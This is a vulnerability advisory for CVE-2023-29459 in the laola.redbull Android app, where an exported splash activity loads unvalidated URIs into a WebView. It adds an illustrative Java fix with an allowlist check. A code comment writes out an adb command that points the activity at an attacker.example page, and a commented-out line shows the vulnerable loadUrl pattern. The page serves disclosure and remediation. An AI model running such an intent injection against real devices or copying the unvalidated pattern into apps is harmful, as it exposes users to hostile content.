PT-2023-22267 · Red Bull · Laola.Redbull

Published: 2023-06-26 · Updated: 2024-12-03 · CVE-2023-29459

CVSS v3.1: 6.1 (Medium)

Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions: laola.redbull application through 5.1.9-R for Android
Description: The laola.redbull application exposes the exported activity at.redbullsalzburg.android.AppMode.Default.Splash.SplashActivity, which accepts a data: URI from the calling intent. The target of that URI is loaded into the application's WebView without validation, so any caller can render arbitrary content in the application's context. The activity can be reached through the fcrbs scheme (a link the user opens, hence UI:R in the vector) or through an explicit intent from another application on the device.
Recommendations: For versions through 5.1.9-R, until a fixed build is available, either stop exporting at.redbullsalzburg.android.AppMode.Default.Splash.SplashActivity (android:exported="false") if other applications do not need to start it, or validate the incoming URI (scheme and host allowlist) before loading it into the WebView and restrict what the WebView may navigate to. On affected devices, avoid opening fcrbs: links from untrusted sources. At the moment there is no information about a newer version that contains a fix for this vulnerability.
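The following is an added illustration of the bug class and of the validation the recommendations ask for; it is not the vendor's source and not code from the advisory. The package name, the allowlisted host, the default URL and the exact manifest layout are assumptions, since the page only names the activity class and the fcrbs scheme.

```java
package example; // hypothetical package; the real app's package is not on the page

import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebResourceRequest;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/*
 * Illustrative reconstruction of the vulnerable pattern and its fix (not vendor code).
 *
 * Shape of the explicit-intent path named in the advisory. <package> is a
 * placeholder because the advisory does not list the application's package name:
 *   adb shell am start -n <package>/at.redbullsalzburg.android.AppMode.Default.Splash.SplashActivity \
 *       -d 'https://attacker.example/page.html'
 * The same URI arrives implicitly when the activity's intent-filter claims the
 * fcrbs scheme and the user taps such a link.
 */
public class SplashActivity extends Activity {

    // Assumed allowlist of origins the WebView is meant to show; substitute the
    // application's own hosts. The real list is not in the advisory.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("laola.redbull.com"));
    private static final String DEFAULT_URL = "https://laola.redbull.com/"; // assumed

    private WebView webView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        webView = new WebView(this);
        setContentView(webView);
        webView.getSettings().setJavaScriptEnabled(true);

        Uri incoming = getIntent().getData();

        // VULNERABLE pattern: the caller's URI is loaded unchanged, so any app or
        // deep link on the device decides what is rendered inside this app.
        //   if (incoming != null) webView.loadUrl(incoming.toString());

        // HARDENED pattern: validate the first load and every later navigation,
        // so the first page cannot redirect the WebView out of the allowlist.
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                // returning true cancels the navigation
                return sanitizeTarget(request.getUrl()) == null;
            }
        });
        String target = sanitizeTarget(incoming);
        webView.loadUrl(target != null ? target : DEFAULT_URL);
    }

    /** Returns the URI as a string if it is safe to load, otherwise null. */
    static String sanitizeTarget(Uri uri) {
        if (uri == null) return null;
        // Only https: rejects javascript:, file:, content:, data: and plain http.
        if (!"https".equalsIgnoreCase(uri.getScheme())) return null;
        // No userinfo: blocks https://laola.redbull.com@attacker.example/ lookalikes.
        if (uri.getUserInfo() != null) return null;
        String host = uri.getHost();
        if (host == null) return null;
        if (!ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT))) return null;
        return uri.toString();
    }
}
```

If the activity only needs to handle the app's own fcrbs: links, the manifest can keep the intent-filter for that scheme while the code above rejects anything outside the allowlist; if no other application needs to start it at all, android:exported="false" on the activity removes the explicit-intent path entirely.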

Weakness Enumeration

Missing validation of a URI received by an exported activity; the URI is loaded into the application's WebView, so content from an untrusted sender runs in the application's context.

Related Identifiers: CVE-2023-29459

Affected Products: Laola.Redbull